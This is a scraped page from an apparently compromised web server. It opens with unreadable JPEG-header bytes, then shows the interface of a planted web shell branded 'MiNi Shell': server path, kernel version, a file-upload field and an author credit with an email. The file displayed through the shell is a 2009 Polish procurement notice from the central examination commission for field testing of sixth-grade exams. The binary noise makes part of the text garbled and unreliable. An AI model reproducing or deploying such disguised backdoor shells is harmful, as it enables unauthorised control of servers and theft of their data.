JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/5237-N-2009.html

<p class="kh_header"><b>Warszawa: Przygotowanie i realizacja badań terenowych w ramach projektu: Pilotaż nowych egzaminów gimnazjalnych oraz sprawdzianu dla klasy VI, Nowa formuła sprawdzianu</b><br>
<b>Numer ogłoszenia: 5237 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralna Komisja Egzaminacyjna , ul. Łucka 11, 00-842 Warszawa, woj. mazowieckie, tel. 022 6563800, faks 6563757.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cke.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i realizacja badań terenowych w ramach projektu: Pilotaż nowych egzaminów gimnazjalnych oraz sprawdzianu dla klasy VI, Nowa formuła sprawdzianu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest terenowa realizacja badań w ramach projektu Pilotaż nowych egzaminów gimnazjalnych oraz sprawdzianu dla klasy VI, Nowa formuła sprawdzianu. Badania terenowe obejmują testowanie zestawów zadań językowych i matematycznych we wskazanych oddziałach klas VI - dwie godzinne sesje testowania w dwa kolejne dni (po jednej godzinie dziennie). Każdy uczeń wypełnia w sumie 2 testy oraz jedną, zawartą w nich ankietę.
2.	Badanie terenowe zostanie przeprowadzone na próbie 3 000 uczniów (+ - 10%) z wylosowanych VI klas z nie więcej niż 100 szkół podstawowych z terenu całej Polski w terminie od 02 do 13.03.2009
3.	Badania terenowe należy przeprowadzić według następującej procedury:
1)	Wykonawca otrzyma listę adresową szkół oraz symbol oddziału-ów klasy VI, w której-rych należy przeprowadzić badanie. Powiadomienie władz oświatowych należy do Zamawiającego.
2)	Do każdej szkoły Wykonawca przydzieli jedną osobę, zwaną dalej ankieterem, (lub dwie w przypadku równoczesnego przeprowadzania badania w dwóch oddziałach klas VI w danej szkole) odpowiedzialną za przeprowadzenie badań. Jedna osoba może być ankieterem w kilku szkołach, jednak nie więcej niż w czterech.
3)	Wykonawca prześle Zamawiającemu listę nazwisk i adresów ankieterów oraz szkół przydzielonych każdemu ankieterowi. Wykonawca wydrukuje i przekaże każdemu ankieterowi Podręcznik ankietera, przygotowany według wzoru przekazanego przez Zamawiającego.
4)	Wszyscy ankieterzy odbędą kilkugodzinne szkolenie, które będzie prowadzone przez przeszkolonych koordynatorów. Wykonawca zorganizuje szkolenia nt. przebiegu badań - dla wszystkich koordynatorów w obecności przedstawiciela Zamawiającego oraz dla ankieterów. Wykonawca zobowiązany jest uzgodnić z  Zamawiającym termin (data i godziny) i miejsce realizacji szkolenia. 
5)	Zamawiający przekaże Wykonawcy wzory narzędzi i materiałów w postaci gotowej do druku. Wykaz narzędzi i materiałów stanowi załącznik nr 1. Druk narzędzi i materiałów w ilościach niezbędnych do realizacji badania ankietowego zapewnia Wykonawca.
6)	Ankieter skontaktuje się telefonicznie z dyrektorem szkoły w celu: uzyskania zgody na przeprowadzenie badania, wyjaśnienia ewentualnych wątpliwości związanych z planowanym badaniem, zweryfikowania danych szkoły, uzgodnienia procedury przekazania listów do rodziców oraz ustalenia terminu przeprowadzenia badania. 
7)	Wykonawca przekaże do szkół, których dyrektorzy wyrazili zgodę na przeprowadzenie badania, listy do rodziców.  
8)	Terminy planowanych badań ankieter przekaże Wykonawcy, który przekaże listę szkół z terminami badania i przydzielonymi ankieterami Zamawiającemu.
9)	Wykonawca przekaże każdemu ankieterowi  arkusze testów, naklejki z kodem szkoły, formularze zgody dyrektora i formularze sprawozdawcze niezbędne do przeprowadzenia badań. Wszystkie materiały będą traktowane jako druki ścisłego zarachowania. Ankieter jest zobowiązany sprawdzić, czy otrzymał komplet materiałów.
10)	W umówionym terminie ankieter: odbierze pisemną zgodę dyrektora szkoły, pisemne odmowy zgody rodziców uczniów oraz przeprowadzi testy we wskazanym oddziale klasowym oddziałach klasowych zgodnie z procedurą opisaną w podręczniku dla ankietera.
11)	Ankieter uporządkuje zebrane materiały i sprawdzi ich kompletność.
12)	Ankieter przekaże: wypełnione testy, pisemną zgodę dyrektora, formularz sprawozdawczy i niewykorzystane testy Wykonawcy, który prześle je, z wyjątkiem wypełnionych testów, Zamawiającemu.
4. Sprawdzanie testów, wprowadzanie i weryfikacja danych
1)	Wykonawca powoła do zakodowania testów 24 osoby z przedstawionej przez Zamawiającego listy. Orientacyjny koszt rynkowy sprawdzenia jednej pracy ucznia wynosi 15 zł. Koszt pracy kodującego ponosi Wykonawca.
2)	Wykonawca przekaże każdemu kodującemu zeszyt kodowy, karty odpowiedzi i naklejki z kodem szkoły.
3)	Wykonawca zorganizuje dwa spotkania w Warszawie z kodującymi:
a.	Szkolenie, które poprowadzą przedstawiciele Zamawiającego, połączone 
z kodowaniem pierwszych prac,
b.	Powtórne kodowanie 20% prac, po którym kodujący przekażą prace i karty odpowiedzi Wykonawcy.
4)	Wykonawca zeskanuje karty odpowiedzi i prześle Zamawiającemu testy, karty odpowiedzi oraz pliki z danymi w formacie SPSS. 

Wprowadzenie i weryfikacja danych z:
a.	testów;
b.	ankiet wypełnianych przez uczniów.
5. Wykonawca:
1)	założy bazę danych zgromadzonego materiału empirycznego;
2)	podda założoną bazę danych kontroli formalnej i logicznej.
Wykonawca przekaże Zamawiającemu wersję elektroniczną baz danych oraz raport.
6. Wykonawca wyśle do szkół podziękowania za udział w badaniu oraz zakupione upominki (publikacje edukacyjne) zgodnie ze wskazaniem Zamawiającego.

Załącznik nr 1
 
Wykaz narzędzi i materiałów niezbędnych do przeprowadzenia badania, których wzory do druku zostaną przekazane Wykonawcy:

1)Arkusze testów dla uczniów (zawierające ankietę) (4 wersje) (format: A4)	6 600 egzemplarzy- 12 stron, druk dwustronny, kolorowy;
2)Karty odpowiedzi (4 wersje) (format: A4) 7 500 sztuk- 1 strona, druk kolorowy
(kolor wskazany do skanowania);
3)Zeszyty kodowe (4 wersje) (format: A4) 30 egzemplarzy- 8 stron, druk dwustronny, czarno-biały;
4)Formularz zgody dyrektora szkoły (format: A4)110 sztuk -1 strona, druk czarno-biały;
5)List do rodziców (format: A4) 3 300 sztuk- 1 strona, druk kolorowy;
6)Podręcznik ankietera (format: A4)	po jednym dla każdego ankietera- 20 stron, druk dwustronny, czarno-biały;
7)Formularze sprawozdawcze (format: A4)240 sztuk-1 strona, druk czarno-biały;
8)Podziękowania dla dyrektorów szkół (format: A4)100 sztuk-1 strona, druk kolorowy;
9)Naklejki z kodem szkoły (kreskowym i literowo-cyfrowym) na arkusze testów i karty odpowiedzi (format: 2x5 cm)14 100 sztuk- druk czarno-biały
10)Podarunki dla szkół (publikacje edukacyjne)100 sztuk- Cena nie więcej niż 150 zł

Terminarz realizacji badań terenowych w ramach projektu V.2 Nowa formuła sprawdzianu z zaznaczeniem podziału obowiązków

01.02.2009r. - Przekazanie Wykonawcy bazy adresowej szkół (z kodami literowo-cyfrowymi szkół) oraz wzorów: podręcznika ankietera, formularza zgody dyrektora, listu do rodziców, formularzy sprawozdawczych - Zamawiający (menedżer projektu).

Drukowanie podręcznika ankietera, formularza zgody dyrektora, listu do rodziców, formularzy sprawozdawczych, naklejek z kodami szkół - Wykonawca.

04.02.2009r. - Szkolenie koordynatorów ankieterów - Wykonawca + przedstawiciel zespołu Zamawiającego.

06.02.2009 - Szkolenie ankieterów w ośrodkach terenowych - Wykonawca.

09.02.2009r. - Kontakt telefoniczny z dyrektorami szkół województw:  warmińsko-mazurskiego, lubuskiego, małopolskiego, świętokrzyskiego i wielkopolskiego, uzyskanie zgody dyrektorów, ustalenie terminu badania - Wykonawca (ankieterzy).

10.02.2009r. - Wysyłka do szkół (z województw: warmińsko-mazurskiego, lubuskiego, małopolskiego, świętokrzyskiego i wielkopolskiego) listów dla rodziców - Wykonawca wg procedury o której mowa w pkt. 3.6).

16.02.2009r. - Kontakt telefoniczny z dyrektorami szkół pozostałych województw, uzyskanie zgody dyrektorów, ustalenie terminu badania - Wykonawca (ankieterzy).

17.02.2009r. - Wysyłka do szkół (z pozostałych województw) listów dla rodziców - Wykonawca wg procedury o której mowa w pkt. 3.6).

20.02.2009r. - Przekazanie Wykonawcy wzorów: podziękowania dla dyrektorów szkół, arkuszy, kart odpowiedzi i zeszytów kodowych - Zamawiający (menedżer projektu).

Przekazanie listy szkół z terminami badania i przydziałem ankieterów - Wykonawca
Drukowanie: podziękowania dla dyrektorów szkół,  arkuszy, kart odpowiedzi i zeszytów kodowych -Wykonawca.

02.03.2009r. - Badania terenowe - rozpoczęcie - Wykonawca.

13.03.2009r. - Badania terenowe - zakończenie - Wykonawca.

Wysyłka do szkół podziękowań i podarunków - Wykonawca.

21.03.2009r. - Spotkanie koderów - szkolenie, kodowanie prac - Wykonawca + zespół Zamawiającego.

28.03.2009r. - Spotkanie koderów - powtórne kodowanie 20% prac - Wykonawca + zespół Zamawiającego.

Tworzenie bazy danych - skanowanie kart odpowiedzi -  Wykonawca.

17.04.2009r. - Przekazanie scalonej i uporządkowanej bazy danych do Zamawiającego (menedżera projektu)- Wykonawca.

30.04.2009r. - Przekazanie raportu do Zamawiającego (menedżera projektu) - Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.31.12.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.02.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2.	Posiadają niezbędną wiedzę i doświadczenie w zakresie przeprowadzenia badań ankietowych tzn. wykażą zrealizowanie w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 2 usług w zakresie przeprowadzenia badań ankietowych  o wartości dla każdej wykazanej usługi nie mniejszej niż 10 000 PLN brutto.
3.	Dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)	Mają do dyspozycji, nie mniej niż 2 osoby, z których każda posiada doświadczenie w koordynowaniu (nadzór nad realizacją) co najmniej 3 badań ankietowych w tym co najmniej 1 badanie nadzorowane w sektorze edukacji;
b)	Mają do dyspozycji, nie mniej niż 25 osób, z których  każda posiada doświadczenie w przeprowadzaniu co najmniej 3 badań ankietowych w tym co najmniej 1 badanie przeprowadzone w sektorze edukacji;
c)	Mają do dyspozycji urządzenie umożliwiające zeskanowanie ankiet w formacie A4 oraz ich zapis w pliku z rozszerzeniem SPSS;
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie warunek, o którym mowa w pkt. 2 i 3 muszą spełnić łącznie.

SPOSÓB OCENY: Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu: 

1.	Oświadczenie Wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych wg wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z podmiotów występujących wspólnie.
2.	Podpisany wykaz sporządzony wg wzoru określonego w załączniku nr 3 do SIWZ, w którym Wykonawca wykaże zrealizowanie w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 2 usług w zakresie przeprowadzenia badań ankietowych  o wartości dla każdej wykazanej usługi nie mniejszej niż 10 000 PLN brutto. 

W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie w/w warunek muszą spełniać łącznie.

3.	Podpisany wykaz sporządzony wg wzoru określonego w załączniku nr 4 do SIWZ, w którym Wykonawca wykaże, że dysponuje lub będzie dysponował nie mniej niż 2 osobami, które będą brały udział w realizacji przedmiotu zamówienia (Koordynatorzy) z których każda posiada doświadczenie w koordynowaniu (nadzór nad realizacją) co najmniej 3 badań ankietowych w tym co najmniej 1 badanie nadzorowane w sektorze edukacji. 

W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie w/w warunek muszą spełniać łącznie.

Jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

4.	Podpisany wykaz sporządzony wg wzoru określonego w załączniku nr 5 do SIWZ, w którym Wykonawca wykaże, że dysponuje lub będzie dysponował nie mniej niż 25 osobami, które będą brały udział w realizacji przedmiotu zamówienia (Ankieterzy) z których każda posiada doświadczenie w przeprowadzaniu co najmniej 3 badań ankietowych w tym co najmniej 1 badanie przeprowadzone w sektorze edukacji;  

W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie w/w warunek muszą spełniać łącznie.

Jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

5.	Podpisany wykaz sporządzony wg wzoru określonego w załączniku nr 6 do SIWZ w którym Wykonawca wykaże, że dysponuje lub będzie dysponował urządzeniem umożliwiającym zeskanowanie ankiet w formacie A4 oraz ich zapis w pliku z rozszerzeniem SPSS. 

W przypadku, gdy o zamówienie ubiegają się Wykonawcy występujący wspólnie w/w warunek muszą spełniać łącznie.

Jeżeli w wykazie Wykonawca wskazał urządzenie, którym będzie dysponował należy załączyć pisemne zobowiązanie innych podmiotów do udostępnienia urządzenia niezbędnego do wykonania zamówienia.

6.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej.

7.	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby(w przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polski) w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej.
 
8.	Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej.

9.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej.
 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt 6), 8), 9) składa odpowiednio dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: 
1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2.	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3.	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu;
Dokumenty o których mowa punkcie a) i b) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument o którym mowa punkcie c) SIWZ powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.   
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. 6-9), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.cke.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralna Komisja Egzaminacyjna, ul. Łucka 11, 00-842 Warszawa, pokój nr 130..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2009 godzina 10:00, miejsce: Oferty winny być złożone w Centralnej Komisji Egzaminacyjnej mieszczącej się w Warszawie (00-842) przy ul. Łucka 11 pokój nr 130..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com